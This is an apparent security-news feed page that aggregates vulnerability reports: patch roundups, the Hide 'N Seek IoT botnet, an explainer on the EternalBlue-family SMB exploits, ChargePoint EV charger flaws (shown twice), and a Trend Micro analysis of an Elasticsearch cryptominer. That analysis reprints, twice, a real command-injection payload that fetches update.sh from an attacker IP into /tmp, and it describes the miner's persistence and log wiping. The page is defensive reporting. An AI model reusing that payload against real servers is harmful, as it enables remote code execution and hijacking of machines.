Category Archives: Vulnerabilities

Adobe December Patch Tuesday Fixed 38 Critical Vulnerabilities In Adobe Reader And Acrobat DC

Adobe has patched a number of security vulnerabilities on the last scheduled monthly update of this year. All these patches

Adobe December Patch Tuesday Fixed 38 Critical Vulnerabilities In Adobe Reader And Acrobat DC on Latest Hacking News.

Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials

Avast security analysts reported that the Hide ‘N Seek botnet continues to grow by infecting vulnerable Internet of Things (IoT) devices still using their default passwords.

According to Avast, the Hide ‘N Seek botnet comes with two main functionalities. The first capability involves the use of a scanner borrowed from Mirai malware to reach random IP addresses of IoT devices and abuse well-known exploits. If this doesn’t work, the scanner attempts to brute-force access to an IoT device using a hard-coded list of default passwords.

For its second functionality, the IoT botnet uses a peer-to-peer (P2P) protocol to share information about new peers, exfiltrate files from an infected device and distribute new binaries, including some for a Monero cryptocurrency miner. Avast’s researchers believe the Monero miner was just a test and that the attackers’ true intentions are still unknown.

A Busy Year for Hide ‘N Seek

Bitdefender researchers were the first to spot the Hide ‘N Seek botnet in January 2018. A few months later, Bitdefender reported the threat had added code that abused two new vulnerabilities affecting Internet Protocol television (IPTV) camera models to scan for a larger pool of vulnerable devices and to achieve persistence on an infected IoT product.

More improvements followed in July, when 360 Netlab observed additional exploits and a then-inactive mining program. Two months later, Bitdefender discovered yet another update when Hide ‘N Seek gained the ability to exploit the Android Debug Bridge (ADB) over Wi-Fi feature in Android devices.

The botnet’s evolution is of particular concern given the overall growth in IoT threats. In just the first half of 2018, Kaspersky Lab detected 121,588 IoT malware samples — three times as many samples uncovered for all of 2017.

How to Defend Your Organization Against IoT Botnets

Security professionals can help defend against IoT botnets by changing all default passwords on their organization’s devices. Toward this end, security teams should also build an incident response team that can oversee software patches and disclose any breaches.

Sources: Avast, Bitdefender, Bitdefender (1), 360 Netlab, Bitdefender(2), Kaspersky Lab

The post Hide ‘N Seek Botnet Continues to Grow by Infecting IoT Devices Using Default Credentials appeared first on Security Intelligence.

This Week in Security News: Security Predictions and Malware Attacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the span of categories for Trend Micro’s 2019 Security Predictions. Also, learn about a new exploit kit that targets home or small office routers which attacks victim’s mobile device or desktop through web applications.

Read on:

2019 Security Predictions Report Released

Good security predictions are very difficult to develop, and companies and consumers need to be selective about the security advice they take.

 

U.S. Investigators Point to China in Marriott Hack Affecting 500 Million Guests

U.S. government investigators increasingly believe that Chinese state hackers were responsible for the Marriott breach that exposed the private information and travel details of as many as 500 million people.

What Happens When Victims Pay Ransomware Attackers?

Although ransomware infections have been around for years now, they continue to spur success – and high monetary profits – for attackers.

House Releases Cybersecurity Strategy Report

The House Energy and Commerce Committee released the comprehensive Cybersecurity Strategy Report, in which it identified procedures to both address and prevent cybersecurity incidents.

The 9 Best Ways to Protect Your New Tech Gifts

The time for all things merry and bright is here and there is nothing brighter than a shiny new smartphone or laptop! Exciting as it is to play with all their new features as soon as they come out of the box, new devices also bring new risks.

New Exploit Kit “Novidade” Found Targeting Home and SOHO Routers

Trend Micro identified a new exploit kit that targets home or small office routers and enables attacks on a victim’s mobile device or desktop through web applications in which they’re authenticated with.

Cybersecurity, Trade Tensions Rank as Top Threats to Markets in 2019, Survey Finds

The biggest risk to markets going into the new year is the threat of a cybersecurity attack, according to a new survey of risk managers and non-risk professionals by the Depository Trust and Clearing Corp.

Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

To prevent attacks that exploit known vulnerabilities in Elasticsearch, it is necessary to patch systems regularly and have security monitoring in place with custom rules.

Security Threats and Risks in Smart Factories

A single cyberattack can negate the benefits derived from a smart factory. That’s why security must not be left behind as organizations move forward with their “smart” agendas. 

Will Sophisticated Attacks Dominate in 2019?

Trend Micro released its 2019 predictions report, warning that attackers will increase the effectiveness of proven attack methods by adding more sophisticated elements to take advantage of the changing technology landscape. 

New Version of Disk-Wiping Shamoon/Disttrack Spotted: What You Need to Know

Trend Micro came across external reports that the notorious, disk-wiping worm Shamoon, also known as Disttrack, has reemerged with an updated version. 

What are some of your 2019 Security Predictions? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Security Predictions and Malware Attacks appeared first on .

How threat actors are using SMB vulnerabilities

Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization’s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.

A patch was released by Microsoft for SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. So now, the unpatched systems allow threats that take advantage of these vulnerabilities inside, helping active malware campaigns spread like Californian wildfire.

SMB vulnerabilities have been so successful for threat actors that they’ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. In fact, our product telemetry has recorded 5,315 detections of Emotet and 6,222 of TrickBot in business networks—two Trojan variants that are using the SMB vulnerabilities—in the last 30 days alone.

What makes them so effective?

What makes some malware so widespread is the way in which it propagates. While massive spam campaigns only render a few victims that actually pay off, a worm-like infection that keeps spreading itself requires little effort for multiplying returns. And that’s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.

For example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for Ransom.WannaCrypt for the month of November 2018.

It’s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.

How did this come about?

At the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)—nothing has appeared yet in the wild.

All these exploits were leaked by the ShadowBrokers Group, who allegedly stole them from the NSA. Less then a month after ShadowBrokers published their “findings,” the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.

Since then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations’ networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.

Let’s now take a closer, more technical look at each exploit and how they work.

EternalBlue

A bug in the process of converting File Extended Attributes (FEA) from OS2 structure to NT structure by the Windows SMB implementation can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.

A buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.

EternalRomance

Eternal Romance is an RCE attack that exploits CVE-2017-0145 against the legacy SMBv1 file-sharing protocol. Please note that file sharing over SMB is normally used only on local networks, and the SMB ports are typically blocked from the Internet by a firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.

At the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.

In other cases, type confusion vulnerability leads to an arbitrary heap write, or heap spray. Heap spraying is a method typically used in exploits that places large amounts of code in a memory location that the attacker expects to be read. Usually, these bits of code point to the start of the actual code that the exploit wants to run in order to compromise the system that is under attack.

After the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.

EternalChampion

The issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers’ advantage.

Meanwhile, a transaction is a type of request that can potentially span multiple packets. For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and this will store the data as it is received from multiple SMBs.

This vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:

  • A primary transaction request that will immediately be executed.
  • A secondary transaction request that triggers the bug caused by the race condition.
  • Sets of primary transactions that heap spray the pool with the intention to place a transaction structure immediately behind the one that tracks the first primary transaction request.

First, a transaction is created that contains the shellcode. This does not start the exploit, it just contains the second stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and immediately begins execution.

The secondary transaction handler copies the secondary transaction request’s data if it fits in the buffer. Except due to the race condition, the pointer now points to the stack of the primary transaction request handlers’ thread (as opposed to the expected pool buffer). This allows an attacker to write their data directly to the stack of another thread.

The attacker has control over the displacement, so they can choose the amount of data to copy and then copy it. This allows them to precisely overwrite a return address stored on the stack of the primary transaction request handler’s thread, and results in the ability for Remote Code Execution.

EternalSynergy

The Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. But the handler automatically assumes that the provided address is the beginning of the buffer. However, during a write transaction, the same address is automatically assumed to be the end of the existing data, and the address pointing to the beginning of the buffer is updated accordingly.

This means that an attacker can construct a secondary message in the transaction to point beyond the start of the buffer, resulting in a buffer overflow during the copy action.

EternalRocks

Looking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven NSA tools where, for example, WannaCry only used two (EternalBlue and another called DoublePulsar).

Prevention and remediation

Despite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.

Patch your systems.

The Windows Operating Systems vulnerable to the attacks found in the wild all predate Windows 10. Most attacks work only on Windows 7 and earlier, and Microsoft released patches for the vulnerabilities that were leaked under the Microsoft Security Bulletin MS17-010. This leaves little-to-no reason for networks to be vulnerable to these attacks, yet the number of current victims is overwhelming.

By applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. And for extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.

In addition, many cybersecurity solutions, including Malwarebytes Endpoint Protection, offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.

For example, Malwarebytes’ anti-exploit module detected WannaCry as Ransom.WannaCrypt right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.

It is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences—especially when SMB vulnerabilities allow infections to spread so quickly.

Don’t be one of those companies. Get protected and stay updated!

The post How threat actors are using SMB vulnerabilities appeared first on Malwarebytes Labs.

Microsoft December Patch Tuesday Addresses Nine Critical Vulnerabilities Including A Zero-Day

This week, Microsoft has rolled out the last scheduled updates for this year. Nonetheless, it again has released a fix

Microsoft December Patch Tuesday Addresses Nine Critical Vulnerabilities Including A Zero-Day on Latest Hacking News.

Google+ Shut Down Date Dragged Earlier Due to Another Massive Breach

A couple of months ago, Google announced they will sunset their product Google Plus. The reasons behind this harsh decision

Google+ Shut Down Date Dragged Earlier Due to Another Massive Breach on Latest Hacking News.

Securelist: Remotely controlled EV home chargers – the threats and vulnerabilities

We are now seeing signs of a possible shift in the field of personal transport. Recent events such as the ‘dieselgate’ scandal undermine customer and government confidence in combustion engines and their environmental safety. At the same time there has been a big step forward in the development of electric vehicles. In addition to favorable media coverage, modern EVs have evolved a lot in terms of battery endurance, driving speeds and interior and exterior design.

To stimulate growth in the personal EV segment some countries even have special tax relief programs for EV owners. But there is still a major problem – the lack of charging infrastructure. This may not be as relevant in big cities, but in other places car owners mostly rely on their own home EV chargers, a relatively new class of device that has attracted our attention.

There are lots of home charger vendors. Some of them, such as ABB or GE, are well-known brands, but some smaller companies have to add ‘bells and whistles’ to their products to attract customers. One of the most obvious and popular options in this respect is remote control of the charging process. But from our point of view this sort of improvement can make chargers an easy target for a variety of attacks. To prove it we decided to take one of them, ChargePoint Home made by ChargePoint, Inc., and conduct some in-depth security research.

ChargePoint Home supports both Wi-Fi and Bluetooth wireless technologies. The end user can remotely control the charging process with a mobile application available for both iOS and Android platforms. All that’s needed is to register a new account in the application, connect a smartphone to the device via Bluetooth, set the parameters of a Wi-Fi network for an internet connection, and finish the registration process by sending the created user ID and the smartphone’s GPS coordinates to the backend from the device.

In a registered state, the device establishes a connection to the remote backend server, which is used to transfer the user’s commands from the application. The application thereby makes it possible to remotely change the maximum consumable current and to start and stop the charging process.

To explore the registration data flows in more detail, we used a rooted smartphone with the hcidump application installed. With this application, we were able to make a dump of the whole registration process, which can later be viewed in Wireshark.

The Bluetooth interface is only used during the registration phase and disabled afterwards. But we found another, rather unusual wireless communication channel that is implemented by means of photodiode on the device side and photoflash on the smartphone side. It seems to have just one purpose: by playing a special blinking pattern on the flash, the application can trigger the factory reset process after the device’s next reboot. During the reboot, Wi-Fi settings and registered user information will be wiped.

In addition, we found a web server with enabled CGI on the device. All web server communications are protected by the SSL protocol with the same scheme as the control server, so the web server inherits the described certificate security issue. We discovered a series of vulnerabilities in CGI binaries that can be used by an intruder to gain control of the device. Two of them were found in the binary used to upload files in different folders to the device depending on the query string parameters. Other vulnerabilities (stack buffer overflow) were found in the binary used to send different commands to the charger in the vendor-specific format (included in a POST message body). We also found the same stack buffer overflow vulnerabilities in the other binary used for downloading different system logs from the device. All this presents attackers with an opportunity to control the charging process by connecting to the target’s Wi-Fi network.

Vulnerabilities in the Bluetooth stack were also found, but they are all minor due to the limited use of Bluetooth during regular device operation.

We can see two major capabilities an intruder can gain from a successful attack. They will be able to:

  • Adjust the maximum current that can be consumed during charging. As a result, an attacker can temporarily disable parts of the user’s home electrical system or even cause physical damage – for example, if the device is not connected properly, a fire could start due to wires overheating.
  • Stop a car’s charging process at any time, for example, restricting an EV owner’s ability to drive where they need to, and even cause financial losses.

We sent all our findings to ChargePoint, Inc. The vulnerabilities we discovered have already been patched, but the question remains as to whether there is any reason to implement wireless interfaces when there is no real need for them. The benefits they bring are often outweighed by the security risks they add.

Download “ChargePoint Home security research” (English, PDF)



Securelist

Remotely controlled EV home chargers – the threats and vulnerabilities

We are now seeing signs of a possible shift in the field of personal transport. Recent events such as the ‘dieselgate’ scandal undermine customer and government confidence in combustion engines and their environmental safety. At the same time there has been a big step forward in the development of electric vehicles. In addition to favorable media coverage, modern EVs have evolved a lot in terms of battery endurance, driving speeds and interior and exterior design.

To stimulate growth in the personal EV segment some countries even have special tax relief programs for EV owners. But there is still a major problem – the lack of charging infrastructure. This may not be as relevant in big cities, but in other places car owners mostly rely on their own home EV chargers, a relatively new class of device that has attracted our attention.

There are lots of home charger vendors. Some of them, such as ABB or GE, are well-known brands, but some smaller companies have to add ‘bells and whistles’ to their products to attract customers. One of the most obvious and popular options in this respect is remote control of the charging process. But from our point of view this sort of improvement can make chargers an easy target for a variety of attacks. To prove it we decided to take one of them, ChargePoint Home made by ChargePoint, Inc., and conduct some in-depth security research.

ChargePoint Home supports both Wi-Fi and Bluetooth wireless technologies. The end user can remotely control the charging process with a mobile application available for both iOS and Android platforms. All that’s needed is to register a new account in the application, connect a smartphone to the device via Bluetooth, set the parameters of a Wi-Fi network for an internet connection, and finish the registration process by sending the created user ID and the smartphone’s GPS coordinates to the backend from the device.

In a registered state, the device establishes a connection to the remote backend server, which is used to transfer the user’s commands from the application. The application thereby makes it possible to remotely change the maximum consumable current and to start and stop the charging process.

To explore the registration data flows in more detail, we used a rooted smartphone with the hcidump application installed. With this application, we were able to make a dump of the whole registration process, which can later be viewed in Wireshark.

The Bluetooth interface is only used during the registration phase and disabled afterwards. But we found another, rather unusual wireless communication channel that is implemented by means of photodiode on the device side and photoflash on the smartphone side. It seems to have just one purpose: by playing a special blinking pattern on the flash, the application can trigger the factory reset process after the device’s next reboot. During the reboot, Wi-Fi settings and registered user information will be wiped.

In addition, we found a web server with enabled CGI on the device. All web server communications are protected by the SSL protocol with the same scheme as the control server, so the web server inherits the described certificate security issue. We discovered a series of vulnerabilities in CGI binaries that can be used by an intruder to gain control of the device. Two of them were found in the binary used to upload files in different folders to the device depending on the query string parameters. Other vulnerabilities (stack buffer overflow) were found in the binary used to send different commands to the charger in the vendor-specific format (included in a POST message body). We also found the same stack buffer overflow vulnerabilities in the other binary used for downloading different system logs from the device. All this presents attackers with an opportunity to control the charging process by connecting to the target’s Wi-Fi network.

Vulnerabilities in the Bluetooth stack were also found, but they are all minor due to the limited use of Bluetooth during regular device operation.

We can see two major capabilities an intruder can gain from a successful attack. They will be able to:

  • Adjust the maximum current that can be consumed during charging. As a result, an attacker can temporarily disable parts of the user’s home electrical system or even cause physical damage – for example, if the device is not connected properly, a fire could start due to wires overheating.
  • Stop a car’s charging process at any time, for example, restricting an EV owner’s ability to drive where they need to, and even cause financial losses.

We sent all our findings to ChargePoint, Inc. The vulnerabilities we discovered have already been patched, but the question remains as to whether there is any reason to implement wireless interfaces when there is no real need for them. The benefits they bring are often outweighed by the security risks they add.

Download “ChargePoint Home security research” (English, PDF)

SecurityWeek RSS Feed: Rhode Island Sues Alphabet Over Google+ Security Incidents

A government organization in Rhode Island announced on Wednesday that it has filed a lawsuit against Google’s parent company, Alphabet Inc., over the recent security incidents involving the Google+ social network.

read more



SecurityWeek RSS Feed

PrivilegeEsc-Linux – Open Source Script for Enumeration on Linux

PrivilegeEsc-Linux is a simple script which checks the security on a Linux machine. It can run many different options, such

PrivilegeEsc-Linux – Open Source Script for Enumeration on Linux on Latest Hacking News.

Think Your Network Is Safe? If You Don’t Have Visibility Into Hardware Vulnerabilities, Think Again

If you follow basic security best practices and quickly patch software issues as they arise, you may think your network is safe from cyberthreats. But think again.

Although the number of reported software vulnerabilities is growing year to year, it’s hardware vulnerabilities that can be even more difficult to fix and can cause extensive damage to enterprise networks. With attack surfaces growing and cybercriminal tactics becoming more dangerous and sophisticated by the minute, security teams can’t afford to neglect hardware flaws.

Security operations center (SOC) analysts need full visibility into Common Vulnerabilities and Exposures (CVE) and other sources of vulnerability data to effectively identify, manage and remediate hardware vulnerabilities. Let’s explore some steps you can take to achieve this visibility and plug security gaps before threat actors can exploit them to breach your network.

Assess Your Inventory to Gain Visibility Into Hardware Vulnerabilites

The first step is to understand your infrastructure. Collect key data on your hardware and software, such as central processing unit (CPU) vendor and model, firmware and basic input/output system (BIOS) version, motherboard vendor and model, and a list of connected devices. These attributes will help you understand the potential impact from a highly visible attack like Meltdown or Spectre and build a response plan accordingly.

If hardware is impacted, it may be very difficult to fix the problem. Often the only viable mitigation strategy is to apply a software patch. Hardware issues frequently occur at the chip level and sometimes require collaboration between hardware and software vendors. Therefore, you need a consolidated view into your hardware and software inventory to assess the exposure level of any hardware vulnerability and know which machines already have a software patch applied.

Identify Reliable Sources of Vulnerability Data

Once you know what hardware and software you have deployed, the next step is to correlate the inventory data with reliable sources of vulnerability data. Data normalization is a known challenge during this phase, and you may choose to either build your own solution or invest in a ready-made application programming interface (API) enriched with vulnerability information. But even with automation, manual work is often required to further enrich this vulnerability data with hardware attributes, assess the impact and prioritize the response accordingly.

Fulfill Your SOC Team’s Need for Speed

To mount a worthy fight against the growing number of cyberthreats amid a growing industrywide skills gap, SOC teams need a solution that addresses their need for speed. If you’re ready to step up to the challenge of hardware vulnerability management, it’s time to shift from a reactive to a proactive approach to endpoint security. Improved visibility into your hardware vulnerabilities is the key to taking that next step.

Make Security Analytics More Effective with Deep Insight into Endpoints

The post Think Your Network Is Safe? If You Don’t Have Visibility Into Hardware Vulnerabilities, Think Again appeared first on Security Intelligence.

Encrypted Messaging Apps Vulnerable To Side-Channel Attacks Including WhatsApp, Telegram, and Signal!

WhatsApp, Signal, and Telegram have all been around for a while. Though a lot of instant messaging apps were already

Encrypted Messaging Apps Vulnerable To Side-Channel Attacks Including WhatsApp, Telegram, and Signal! on Latest Hacking News.

TrendLabs Security Intelligence Blog: Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

by Jindrich Karasek and Loseway Lu

We detected mining activity on our honeypot that involves the search engine Elasticsearch, which is a Java-developed search engine based on the Lucene library and released as open-source. The attack was deployed by taking advantage of known vulnerabilities CVE-2015-1427, a vulnerability in its Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a vulnerability in the default configuration of Elasticsearch. The vulnerable versions are no longer supported by Elasticsearch.

We found a search query with the following command (also described in a blog by ISC) on a server running Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P
/tmp/sssooo\”).getText()”}}}”

The command was run by the same system/attacking host, which also hosted the payload. At the time of writing, the IP is resolved to the domain name matrixhazel[.]com, which was inaccessible. The system was also found to have installed CentOS 6, which runs both web and SSH servers.

Figure 1. GreyNoise marked the host as a known scanner

Figure 1. GreyNoise marked the host as a known scanner

It is important to note that this kind of attack is not new, but it has recently reemerged. For instance, Trend Micro Smart Protection Network feedback in November detected the cryptocurrency miner on endpoints in several countries such as China, Taiwan, and the United States.

The miner distributes the bash script update.sh by first invoking the shell and running the download command with output set in the “/tmp/sssooo” file. “/tmp” is used because it has less restrictive permissions on most systems by default.

This attack is relatively simple, yet can have a significant impact on the victim. Once the attacker gains the ability to run arbitrary commands on the system, he can attempt to escalate the privileges or even pivot to other systems in order to compromise the network further.

It should also be noted that while the scheme of the attack is the same in most cases, the payloads might differ. In this case that we analyzed, the payload was the file update.sh. Once run, the bash script update.sh downloads two files called devtools and config.json. The script then deploys the cryptocurrency miner (detected by Trend Micro as Coinminer.Linux.MALXMR.UWEIS).

The actual file with the miner’s ELF64 binary is named devtools, which helps disguise the miner, as “devtools” is also a regular tool on GitHub. The miner uses a configuration as stated in the file config.json.

Figure 2. Details of the configuration file config.json

Figure 2. Details of the configuration file config.json

Such a scheme is already widely used, but the wrapper bash script has several other interesting functions. The coding style is very similar to hacking tools, and parts of the code were also spotted in an Xbash-related case before.

How the cryptocurrency miner is deployed

The miner consists of three files, downloaded through either wget, curl, or url commands in bash:

Figure 3. wget, curl, and url commands

Figure 3. wget, curl, and url commands

The miner is capable of downloading the following:

  • Devtools – The actual miner;
  • Update.sh – The bash script used to download all the parts (The script is also run during the attack.);
  • Config.json – The configuration file for the miner.

First, it attempts to save the files into the “/etc/” directory, and tries the “/tmp” in case it fails. The latter was the success in our case. After that, it checks for other ongoing mining activity in the machine. It assumes the device has already been attacked, and hijacks the machine from its previous attacker. This process may also be used to update the running miner to a newer version.

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

If it detects other miners in the system, the running processes related to the miners will be killed. It also resets the crontab so cron won’t start other miners again.

Figure 5. Processes of other miners found in the system will be killed

Figure 5. Processes of other miners found in the system will be killed

The miner adds itself to the crontab so it’s run every 10 minutes. At the beginning of each run, it unlocks itself with “chattr -i“ and updates its files, while at the end of each run it protects the files with “chattr +i” which serves to prevent the file from modification or removal by other low privilege users. It also cleans its tracks by emptying the history logs (as seen in Figure 8). One interesting point is when the script is running in the root directory, the script tries to add its own SSH key to the authorized_keys, which allows it to login without a password. Somehow the command order looks buggy, causing the removal of authorized_keys right after the key is added.

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 7. Miner modifies the iptables/firewall in the system

Figure 7. Miner modifies the iptables/firewall in the system

Figure 8. Miner cleans its track by removing the history and emptying files

Figure 8. Miner cleans its track by removing the history and emptying files

Conclusion and Recommendations

To prevent attacks that exploit known vulnerabilities in Elasticsearch, it is necessary to patch systems regularly and have security monitoring in place with custom rules, which allows for the detection of basic events as well as complex alerts.

There are variations to the command injected in Elasticsearch as spotted in the wild, but they have these factors in common:

  • They all invoke shell to run a command;
  • They all contain a command to download a file from remote/local locations, like curl, wget, url, ftp/get, and so on;
  • They download the file into either “/etc” or “/tmp”;
  • They are usually tried in sequence as the host tries to use all combinations of download file locations and commands to be run on local system (in order to download the malicious file).

Detection of related attacks is crucial and should be done through these measures:

  • Log Elasticsearch usage and monitor for strings that may suggest command injection.
  • Monitor the system’s behavior. Shell should only be used by authorized users and solutions.
  • Classify network traffic through correlation. In our case, malicious IP would be regularly called every 10 minutes. This should be easy to spot with the right network monitoring process and traffic analysis in place.

Users can consider adopting security solutions that can defend against cryptocurrency-mining malware through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs)

Related hashes (SHA-256)
191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c devtools Coinminer.Linux.MALXMR.UWEIS
d3e1231d1429dccb47caf0c1c46d2eb24afe33887b31a818b8f07f0406db2637 update.sh Coinminer.SH.MALXMR.ATNL

69.30.211.82 – attacker
69.30.203.170

Command used in Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\”).getText()”}}}”

Spoofed Elasticsearch version number: 1.4.1

The post Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch appeared first on .



TrendLabs Security Intelligence Blog

TrendLabs Security Intelligence Blog: December Patch Tuesday: Year-End Batch Addresses Win32k Elevation of Privilege and Windows DNS Server Vulnerabilities

The just-released Patch Tuesday for December includes a fix for the actively exploited Win32k Elevation of Privilege Vulnerability (CVE-2018-8611). The flaw allows an attacker to exploit a bug in the Windows Kernel and run arbitrary code to install programs; view, change, or delete data; or create new accounts with full user rights. It is also pointed out as likely being used with other bugs in targeted attacks.

The patch release fixes another vulnerability that’s currently under active attack: CVE-2018-8626, a Windows DNS Server Heap Overflow remote code execution (RCE) vulnerability that exists when DNS servers fail to properly handle requests. An attacker who successfully exploits the vulnerability could run arbitrary code in the context of the Local System Account. Taking advantage of the vulnerability can be done by sending a specially crafted request to an affected DNS server.

Other noteworthy patches in the batch include a Critical-rated remote code injection vulnerability in the .NET Framework and a text-to-speech RCE bug.

Microsoft closes out the year with 39 security patches and one advisory that cover issues in Internet Explorer (IE), Edge, ChakraCore, Microsoft Windows, Office and Microsoft Office Services and Web Apps, and the .NET Framework. Of the 39 CVEs, nine are listed as Critical and 30 as Important in severity. Five were disclosed through the Zero Day Initiative (ZDI) program.

On the Adobe front, a total of 87 CVEs were covered by their release, with 39 of these handled by the ZDI. All of the bugs are listed as Important, save for one Moderate CVE. As early as December 5, Adobe also shipped an early patch for Flash Player that addresses two CVEs, with one designated as CVE-2018-15982 and listed as under active attack. The use-after-free (UAF) exploit allows an attacker to execute code at the level of a logged on user. The embedded Flash SWF in a Microsoft Office document is being spread through spear phishing campaigns.

Trend Micro™ Deep Security and Vulnerability Protection protect user systems from any threats that may target the vulnerabilities addressed in this month’s round of updates via the following DPI rules:

  • 1009409-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8583)
  • 1009410-Microsoft Internet Explorer Remote Code Execution Vulnerability (CVE-2018-8619)
  • 1009411-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8617)
  • 1009412-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8618)
  • 1009413-Microsoft Text-To-Speech Remote Code Execution Vulnerability (CVE-2018-8634)
  • 1009414-Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2018-8631)
  • 1009415-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8629)
  • 1009416-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8624)
  • 1009427-Microsoft PowerPoint Remote Code Execution Vulnerability (CVE-2018-8628)
  • 1009428-Microsoft Outlook Remote Code Execution Vulnerability (CVE-2018-8587)
  • 1009429-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2018-8643)
  • 1009430-Microsoft Internet Explorer Remote Code Execution Vulnerability (CVE-2018-8625)
  • 1009431-Microsoft Windows Multiple Security Vulnerabilities (Dec-2018)

Trend Micro™ TippingPoint™ customers are protected from threats that may exploit this month’s list of vulnerabilities via these MainlineDV filters:

  • 33685: HTTP: Microsoft Edge Chakra JIT Type Confusion Vulnerability
  • 33686: HTTP: Microsoft Edge Chakra InlineArrayPush Type Confusion Vulnerability
  • 33687: HTTP: Microsoft Edge Chakra defineSetter Type Confusion Vulnerability
  • 33688: HTTP: Microsoft Edge Memory Corruption Vulnerability
  • 33689: HTTP: Microsoft Edge ArrayBuffer Out-of-Bounds Write Vulnerability
  • 33690: HTTP: Microsoft Internet Explorer Array Prototype Out-of-Bounds Write Vulnerability
  • 33691: HTTP: Microsoft Edge SpeechSynthesis Buffer Overflow Vulnerability
  • 33708: HTTP: Microsoft XML XSL VBScript Usage
  • 33711: HTTP: Adobe Flash Player SWF Parsing Use-After-Free Vulnerability
